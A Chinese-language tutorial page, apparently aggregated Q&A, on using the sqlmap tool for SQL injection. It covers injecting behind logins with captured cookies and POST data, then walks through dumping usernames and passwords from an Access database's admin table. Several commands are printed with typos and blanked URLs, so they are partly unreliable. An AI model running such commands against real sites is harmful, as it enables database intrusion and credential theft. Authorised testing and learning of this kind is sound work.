本文目录一览：

• 1、需要登录的网页 sqlmap怎么注入
• 2、sqlmap一跑就死，怎么注入
• 3、怎么用sqlmap测试登录注入
• 4、sqlmap怎么注入ACCESS数据库

需要登录的网页 sqlmap怎么注入

·对于需要登录的网站，我们需要指定其cookie 。我们可以用账号密码登录，然后用抓包工具抓取其cookie填入。

sqlmap -u "" --cookie="抓取的cookie" #探测该url是否存在漏洞

·对于是post提交数据的URL，我们需要指定其data参数

sqlmap -u "" --data="uname=adminpasswd=adminsubmit=Submit" #抓取其post提交的数据填入

我们也可以通过抓取 http 数据包保存为文件，然后指定该文件即可。这样，我们就可以不用指定其他参数，这对于需要登录的网站或者post提交数据的网站很方便。

我们抓取了一个post提交数据的数据包保存为post.txt，如下，uname参数和passwd参数存在SQL注入漏洞

sqlmap一跑就死，怎么注入

安装sqlmap

解压下载的sqlmap压缩包，里面是sqlmap源码，无需安装，可直接使用

使用sqlmap

对于存在漏洞的url如：

打开cmd在sqlmap目录下输入如下语句：python sqlmap.py -u

怎么用sqlmap测试登录注入

严谨一点问题应该是：怎么用sqlmap测试Post注入，方法为：

第一种方式：./sqlmap.py -r post.txt(储存post数据的文本) -p 要注入的参数

第二种方式：sqlmap -u "url" --forms

第三种方式：sqlmap -u "url" --data "指定的参数"（如txt_UserName=aaatxt_Pwd=aaaa）

sqlmap怎么注入ACCESS数据库

方法/步骤

首先我们先来跑表

命令是sqlmap –u “url/NewsShow.asp?id=69” –tables

一路上大家遇到这个

可以直接选择回车

等到了这里

大家选择线程1到10

开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表

然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin

然后得到了里面的字段username password id

然后我们直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”

然后一路还是回车。到了

还是选择线程1到10

最后跑出了用户名。密码

9